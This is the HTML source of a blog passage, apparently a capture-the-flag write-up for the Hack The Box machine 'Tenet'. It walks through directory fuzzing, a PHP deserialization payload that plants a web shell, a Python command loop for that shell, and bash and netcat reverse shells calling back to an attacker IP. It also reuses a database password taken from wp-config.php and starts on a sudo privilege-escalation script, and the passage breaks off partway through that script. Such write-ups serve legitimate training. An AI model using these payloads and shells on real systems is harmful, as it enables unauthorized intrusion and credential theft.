&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#ae81ff&#34;&gt;&lt;/span&gt;        &lt;span style=&#34;color:#ae81ff&#34;&gt;\ \ \_&lt;/span&gt;/ &lt;span style=&#34;color:#ae81ff&#34;&gt;\ \ \_&lt;/span&gt;/&lt;span style=&#34;color:#ae81ff&#34;&gt;\ \ \_\ \ \ \ \_&lt;/span&gt;/
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;         &lt;span style=&#34;color:#ae81ff&#34;&gt;\ \_\ &lt;/span&gt;  &lt;span style=&#34;color:#ae81ff&#34;&gt;\ \_\ &lt;/span&gt; &lt;span style=&#34;color:#ae81ff&#34;&gt;\ \_&lt;/span&gt;___/  &lt;span style=&#34;color:#ae81ff&#34;&gt;\ \_\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#ae81ff&#34;&gt;&lt;/span&gt;          &lt;span style=&#34;color:#ae81ff&#34;&gt;\/&lt;/span&gt;_/    &lt;span style=&#34;color:#ae81ff&#34;&gt;\/&lt;/span&gt;_/   &lt;span style=&#34;color:#ae81ff&#34;&gt;\/&lt;/span&gt;___/    &lt;span style=&#34;color:#ae81ff&#34;&gt;\/&lt;/span&gt;_/
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;       v1.1.0
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;________________________________________________
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt; :: Method           : GET
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt; :: URL              : http://10.10.10.223/FUZZ
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt; :: Wordlist         : FUZZ: /opt/dirbuster-wordlists/directory-list-2.3-medium.txt
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt; :: Follow redirects : false
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt; :: Calibration      : false
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt; :: Timeout          : &lt;span style=&#34;color:#ae81ff&#34;&gt;10&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt; :: Threads          : &lt;span style=&#34;color:#ae81ff&#34;&gt;40&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt; :: Matcher          : Response status: 200,204,301,302,307,401,403
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;________________________________________________
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;                        &lt;span style=&#34;color:#f92672&#34;&gt;[&lt;/span&gt;Status: 200, Size: 10918, Words: 3499, Lines: 376&lt;span style=&#34;color:#f92672&#34;&gt;]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#ae81ff&#34;&gt;1&lt;/span&gt;                       &lt;span style=&#34;color:#f92672&#34;&gt;[&lt;/span&gt;Status: 200, Size: 1688, Words: 186, Lines: 43&lt;span style=&#34;color:#f92672&#34;&gt;]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;wordpress               &lt;span style=&#34;color:#f92672&#34;&gt;[&lt;/span&gt;Status: 301, Size: 316, Words: 20, Lines: 10&lt;span style=&#34;color:#f92672&#34;&gt;]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;                        &lt;span style=&#34;color:#f92672&#34;&gt;[&lt;/span&gt;Status: 200, Size: 10918, Words: 3499, Lines: 376&lt;span style=&#34;color:#f92672&#34;&gt;]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;server-status           &lt;span style=&#34;color:#f92672&#34;&gt;[&lt;/span&gt;Status: 403, Size: 277, Words: 20, Lines: 10&lt;span style=&#34;color:#f92672&#34;&gt;]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;:: Progress: &lt;span style=&#34;color:#f92672&#34;&gt;[&lt;/span&gt;220547/220547&lt;span style=&#34;color:#f92672&#34;&gt;]&lt;/span&gt; :: Job &lt;span style=&#34;color:#f92672&#34;&gt;[&lt;/span&gt;1/1&lt;span style=&#34;color:#f92672&#34;&gt;]&lt;/span&gt; :: &lt;span style=&#34;color:#ae81ff&#34;&gt;276&lt;/span&gt; req/sec :: Duration: &lt;span style=&#34;color:#f92672&#34;&gt;[&lt;/span&gt;0:13:17&lt;span style=&#34;color:#f92672&#34;&gt;]&lt;/span&gt; :: Errors: &lt;span style=&#34;color:#ae81ff&#34;&gt;0&lt;/span&gt; ::
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Adding &lt;code&gt;tenet.htb&lt;/code&gt; to  &lt;code&gt;/etc/hosts&lt;/code&gt; will make it function better. Wordpress tends to want to redirect to a domain. There are a few articles talking about their newly coming services and mention of a site migration. On one post, there is a comment that references a &amp;ldquo;sator.php&amp;rdquo; file and a backup version of it. Seemingly, the site migration is incomplete.&lt;/p&gt;
&lt;p&gt;&lt;img  src=&#34;http://0xnightwolf.github.io/img/tenet-migrationcomment.png&#34;
        alt/&gt;&lt;/p&gt;
&lt;p&gt;Sator dosent&amp;rsquo; exist on this site this site. However,  box might have multiple virtual hosts. That turns out to be the case. After &lt;code&gt;sator.tenet.htb&lt;/code&gt; is added &lt;code&gt;/etc/hosts&lt;/code&gt; a copy of the wordpress site seen found prior is accessible  On this one, &lt;code&gt;sator.php&lt;/code&gt; is present and more importantly, the aforementioned backup version of it, &lt;code&gt;sator.php.bak&lt;/code&gt; is also accessible.&lt;/p&gt;
&lt;h2 id=&#34;foothold&#34;&gt;Foothold&lt;/h2&gt;
&lt;p&gt;&lt;img  src=&#34;http://0xnightwolf.github.io/img/tenet-statorphpbak.png&#34;
        alt/&gt;&lt;/p&gt;
&lt;p&gt;&lt;code&gt;sator.php&lt;/code&gt; takes input through the &lt;code&gt;arepo&lt;/code&gt; parameter. That output is then deserialized. There is also a class that is called DatabaseExport that writes to a file Deseralizaiton can lead to some unintended results through object injection.&lt;/p&gt;
&lt;p&gt;The &lt;code&gt;__destruct ()&lt;/code&gt; function means PHP file can be leveraged to create object and from it a file. To  pull this off, write a PHP file that mirrors sator.php but a bit different.&lt;/p&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;&#34;&gt;&lt;code class=&#34;language-php&#34; data-lang=&#34;php&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#f92672&#34;&gt;&amp;lt;?&lt;/span&gt;&lt;span style=&#34;color:#a6e22e&#34;&gt;php&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#66d9ef&#34;&gt;class&lt;/span&gt; &lt;span style=&#34;color:#a6e22e&#34;&gt;DatabaseExport&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;{
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;    &lt;span style=&#34;color:#66d9ef&#34;&gt;public&lt;/span&gt; $user_file &lt;span style=&#34;color:#f92672&#34;&gt;=&lt;/span&gt; &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#39;users.txt&amp;#39;&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;    &lt;span style=&#34;color:#66d9ef&#34;&gt;public&lt;/span&gt; $data &lt;span style=&#34;color:#f92672&#34;&gt;=&lt;/span&gt; &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#39;&amp;#39;&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;    &lt;span style=&#34;color:#66d9ef&#34;&gt;public&lt;/span&gt; &lt;span style=&#34;color:#66d9ef&#34;&gt;function&lt;/span&gt; &lt;span style=&#34;color:#a6e22e&#34;&gt;update_db&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;    {
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;        &lt;span style=&#34;color:#66d9ef&#34;&gt;echo&lt;/span&gt; &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#39;[+] Grabbing users from text file &amp;lt;br&amp;gt;&amp;#39;&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;        $this&lt;span style=&#34;color:#f92672&#34;&gt;-&amp;gt;&lt;/span&gt; &lt;span style=&#34;color:#a6e22e&#34;&gt;data&lt;/span&gt; &lt;span style=&#34;color:#f92672&#34;&gt;=&lt;/span&gt; &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#39;Sucess&amp;#39;&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;    }
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;    &lt;span style=&#34;color:#66d9ef&#34;&gt;public&lt;/span&gt; &lt;span style=&#34;color:#66d9ef&#34;&gt;function&lt;/span&gt; __construct()
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;    {
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;        $this&lt;span style=&#34;color:#f92672&#34;&gt;-&amp;gt;&lt;/span&gt;&lt;span style=&#34;color:#a6e22e&#34;&gt;user_file&lt;/span&gt; &lt;span style=&#34;color:#f92672&#34;&gt;=&lt;/span&gt; &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#39;magic.php&amp;#39;&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;        $this&lt;span style=&#34;color:#f92672&#34;&gt;-&amp;gt;&lt;/span&gt;&lt;span style=&#34;color:#a6e22e&#34;&gt;data&lt;/span&gt; &lt;span style=&#34;color:#f92672&#34;&gt;=&lt;/span&gt; &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#39;&amp;lt;?php system(&amp;#34;whoami&amp;#34;); ?&amp;gt;&amp;#39;&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;    }
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;$app &lt;span style=&#34;color:#f92672&#34;&gt;=&lt;/span&gt; &lt;span style=&#34;color:#66d9ef&#34;&gt;new&lt;/span&gt; &lt;span style=&#34;color:#a6e22e&#34;&gt;DatabaseExport&lt;/span&gt;();
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#66d9ef&#34;&gt;echo&lt;/span&gt; &lt;span style=&#34;color:#a6e22e&#34;&gt;serialize&lt;/span&gt;($app);
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#66d9ef&#34;&gt;echo&lt;/span&gt; &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#34;&lt;/span&gt;&lt;span style=&#34;color:#ae81ff&#34;&gt;\n&lt;/span&gt;&lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#34;&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#75715e&#34;&gt;?&amp;gt;&lt;/span&gt;&lt;span style=&#34;color:#960050;background-color:#1e0010&#34;&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Instead of a &lt;code&gt;__destruct&lt;/code&gt; a is used &lt;code&gt;__construct&lt;/code&gt; and a few other items are changed as well. The output file is going to be called &lt;code&gt;magic.php&lt;/code&gt; and the contents will be some simple PHP code to execute the &lt;code&gt;whomami&lt;/code&gt; command.&lt;/p&gt;
&lt;p&gt;Running the above file using &lt;code&gt;php file&lt;/code&gt; and outputs the following.&lt;/p&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;&#34;&gt;&lt;code class=&#34;language-vim&#34; data-lang=&#34;vim&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#a6e22e&#34;&gt;O&lt;/span&gt;:&lt;span style=&#34;color:#ae81ff&#34;&gt;14&lt;/span&gt;:&lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#34;DatabaseExport&amp;#34;&lt;/span&gt;:&lt;span style=&#34;color:#ae81ff&#34;&gt;2&lt;/span&gt;:{&lt;span style=&#34;color:#a6e22e&#34;&gt;s&lt;/span&gt;:&lt;span style=&#34;color:#ae81ff&#34;&gt;9&lt;/span&gt;:&lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#34;user_file&amp;#34;&lt;/span&gt;;&lt;span style=&#34;color:#a6e22e&#34;&gt;s&lt;/span&gt;:&lt;span style=&#34;color:#ae81ff&#34;&gt;9&lt;/span&gt;:&lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#34;magic.php&amp;#34;&lt;/span&gt;;&lt;span style=&#34;color:#a6e22e&#34;&gt;s&lt;/span&gt;:&lt;span style=&#34;color:#ae81ff&#34;&gt;4&lt;/span&gt;:&lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#34;data&amp;#34;&lt;/span&gt;;&lt;span style=&#34;color:#a6e22e&#34;&gt;s&lt;/span&gt;:&lt;span style=&#34;color:#ae81ff&#34;&gt;26&lt;/span&gt;:&lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#34;&amp;lt;?php system(&amp;#34;&lt;/span&gt;&lt;span style=&#34;color:#a6e22e&#34;&gt;whoami&lt;/span&gt;&lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#34;); ?&amp;gt;&amp;#34;&lt;/span&gt;;}&lt;span style=&#34;color:#960050;background-color:#1e0010&#34;&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This can be sent to the server using the &lt;code&gt;arepo&lt;/code&gt; argument. Then a request can be made to &lt;code&gt;10.10.10.223/magic.php&lt;/code&gt;. The response is &lt;code&gt;www-data&lt;/code&gt;, showing code execution.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;If you are interested in learning more about PHP deserialization attacks, IppSec has some awesome videos I referenced while working on this. &lt;a href=&#34;https://youtu.be/JpzREo7XLOY?t=4174&#34;target=&#34;_blank&#34; rel=&#34;noopener noreferrer&#34;&gt;Player 2 PHP deserialization to place an SSH key.&lt;/a&gt;
 and &lt;a href=&#34;https://www.youtube.com/watch?v=HaW15aMzBUM&#34;target=&#34;_blank&#34; rel=&#34;noopener noreferrer&#34;&gt;Intro to PHP deserialization&lt;/a&gt;
&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;This is a bit clumsy though and there are some ways it can be nicened up.&lt;/p&gt;
&lt;p&gt;First  &lt;code&gt;whoami&lt;/code&gt; can be changed to instead take the  argument &lt;code&gt;c&lt;/code&gt; from a get request and execute using the system function.&lt;/p&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;&#34;&gt;&lt;code class=&#34;language-php&#34; data-lang=&#34;php&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#f92672&#34;&gt;&amp;lt;?&lt;/span&gt;&lt;span style=&#34;color:#a6e22e&#34;&gt;php&lt;/span&gt; &lt;span style=&#34;color:#66d9ef&#34;&gt;echo&lt;/span&gt; &lt;span style=&#34;color:#a6e22e&#34;&gt;shell_exec&lt;/span&gt;($_GET[&lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#39;c&amp;#39;&lt;/span&gt;]); &lt;span style=&#34;color:#75715e&#34;&gt;?&amp;gt;&lt;/span&gt;&lt;span style=&#34;color:#960050;background-color:#1e0010&#34;&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;That can be created on the Tenet with following.
&lt;code&gt;http://sator.tenet.htb/sator.php?arepo=O:14:&amp;quot;DatabaseExport&amp;quot;:2:{s:9:&amp;quot;user_file&amp;quot;;s:9:&amp;quot;magic.php&amp;quot;;s:4:&amp;quot;data&amp;quot;;s:37:&amp;quot;&amp;lt;?php echo shell_exec($_GET[&amp;quot;c&amp;quot;]); ?&amp;gt;&amp;quot;;}&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;This is very workable and requests can be  sent  with curl, burp, postman, or even just a web browser. But console applications are cool.&lt;/p&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;&#34;&gt;&lt;code class=&#34;language-python&#34; data-lang=&#34;python&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#f92672&#34;&gt;import&lt;/span&gt; requests
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#f92672&#34;&gt;import&lt;/span&gt; readline
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;URI &lt;span style=&#34;color:#f92672&#34;&gt;=&lt;/span&gt; input(&lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#34;Path to PHP shell. (http://example.site/file.php)&lt;/span&gt;&lt;span style=&#34;color:#ae81ff&#34;&gt;\n&lt;/span&gt;&lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;print(&lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#34;Sending commands to: &amp;#34;&lt;/span&gt; &lt;span style=&#34;color:#f92672&#34;&gt;+&lt;/span&gt; URI)
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#66d9ef&#34;&gt;while&lt;/span&gt; &lt;span style=&#34;color:#ae81ff&#34;&gt;1&lt;/span&gt;:
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;	command &lt;span style=&#34;color:#f92672&#34;&gt;=&lt;/span&gt; input(&lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#34;&amp;gt;&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;	&lt;span style=&#34;color:#66d9ef&#34;&gt;if&lt;/span&gt; command &lt;span style=&#34;color:#f92672&#34;&gt;==&lt;/span&gt; &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#39;exit&amp;#39;&lt;/span&gt;:
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;		&lt;span style=&#34;color:#66d9ef&#34;&gt;break&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;	&lt;span style=&#34;color:#66d9ef&#34;&gt;else&lt;/span&gt;:
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;		r &lt;span style=&#34;color:#f92672&#34;&gt;=&lt;/span&gt; requests&lt;span style=&#34;color:#f92672&#34;&gt;.&lt;/span&gt;get(URI&lt;span style=&#34;color:#f92672&#34;&gt;+&lt;/span&gt; &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#34;?c=&amp;#34;&lt;/span&gt; &lt;span style=&#34;color:#f92672&#34;&gt;+&lt;/span&gt; command)
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;		print(r&lt;span style=&#34;color:#f92672&#34;&gt;.&lt;/span&gt;text)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;It&amp;rsquo;s fairly simple in nature but it does give a way to send and receive commands a terminal like interface. Now that that is ready to go, it&amp;rsquo;s time to get a proper reverse shell.&lt;/p&gt;
&lt;p&gt;The old fallback of &lt;code&gt;basn -c &#39;bash -i &amp;gt;&amp;amp;/dev/tcp/&amp;lt;ip&amp;gt;/&amp;lt;port&amp;gt; 0&amp;gt;&amp;amp;1&#39;&lt;/code&gt; fails along with a similar one using netcat &lt;code&gt;nc -e /bin/sh &amp;lt;ip&amp;gt; &amp;lt;port&amp;gt;&lt;/code&gt;. There is more than one way to send this payload though.&lt;/p&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;&#34;&gt;&lt;code class=&#34;language-bash&#34; data-lang=&#34;bash&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#75715e&#34;&gt;#!/bin/bash
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#75715e&#34;&gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;basn -c &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#39;bash -i &amp;gt;&amp;amp;/dev/tcp/10.10.14.36/5678 0&amp;gt;&amp;amp;1&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This file is created and saved, a python HTTP server is started in the same directory, and a netcat listener on port 5678. Then we go back to back to our &amp;ldquo;terminal&amp;rdquo; access for Tenet, wget the file, mark it as executable and run it. Right away the netcat listener get&amp;rsquo;s a connection.&lt;/p&gt;
&lt;p&gt;&lt;img  src=&#34;http://0xnightwolf.github.io/img/tenet-properreverseshellsteps.png&#34;
        alt/&gt;&lt;/p&gt;
&lt;h2 id=&#34;user&#34;&gt;User&lt;/h2&gt;
&lt;p&gt;The CWD is wordpress home directory. Listing the files shows the &lt;code&gt;wp-config.php&lt;/code&gt;  file. Inside are credentials configured for interacting with the MySQL database. &lt;code&gt;neil:Opera2112&lt;/code&gt;. Neil used the same password for their login allowing SSH access directory to the box.&lt;/p&gt;
&lt;p&gt;&lt;img  src=&#34;http://0xnightwolf.github.io/img/tenet-wp-configphp.png&#34;
        alt/&gt;&lt;/p&gt;
&lt;h2 id=&#34;root&#34;&gt;Root&lt;/h2&gt;
&lt;p&gt;&lt;img  src=&#34;http://0xnightwolf.github.io/img/tenet-neilsudopermissions.png&#34;
        alt/&gt;&lt;/p&gt;
&lt;p&gt;Via &lt;code&gt;sudo -l&lt;/code&gt; Niel&amp;rsquo;s sudo permissions can be checked. It turns it out they can run a script called&lt;code&gt;EnableSSH.sh&lt;/code&gt; with root permissions.&lt;/p&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;&#34;&gt;&lt;code class=&#34;language-bash&#34; data-lang=&#34;bash&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;neil@tenet:~$ cat /usr/local/bin/enableSSH.sh
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#75715e&#34;&gt;#!/bin/bash&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;checkAdded&lt;span style=&#34;color:#f92672&#34;&gt;()&lt;/span&gt; &lt;span style=&#34;color:#f92672&#34;&gt;{&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;        sshName&lt;span style=&#34;color:#f92672&#34;&gt;=&lt;/span&gt;&lt;span style=&#34;color:#66d9ef&#34;&gt;$(&lt;/span&gt;/bin/echo $key | /usr/bin/cut -d &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#34; &amp;#34;&lt;/span&gt; -f 3&lt;span style=&#34;color:#66d9ef&#34;&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;        &lt;span style=&#34;color:#66d9ef&#34;&gt;if&lt;/span&gt; &lt;span style=&#34;color:#f92672&#34;&gt;[[&lt;/span&gt; ! -z &lt;span style=&#34;color:#66d9ef&#34;&gt;$(&lt;/span&gt;/bin/grep $sshName /root/.ssh/authorized_keys&lt;span style=&#34;color:#66d9ef&#34;&gt;)&lt;/span&gt; &lt;span style=&#34;color:#f92672&#34;&gt;]]&lt;/span&gt;; &lt;span style=&#34;color:#66d9ef&#34;&gt;then&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;                /bin/echo &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#34;Successfully added &lt;/span&gt;$sshName&lt;span style=&#34;color:#e6db74&#34;&gt; to authorized_keys file!&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;        &lt;span style=&#34;color:#66d9ef&#34;&gt;else&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;                /bin/echo &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#34;Error in adding &lt;/span&gt;$sshName&lt;span style=&#34;color:#e6db74&#34;&gt; to authorized_keys file!&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;
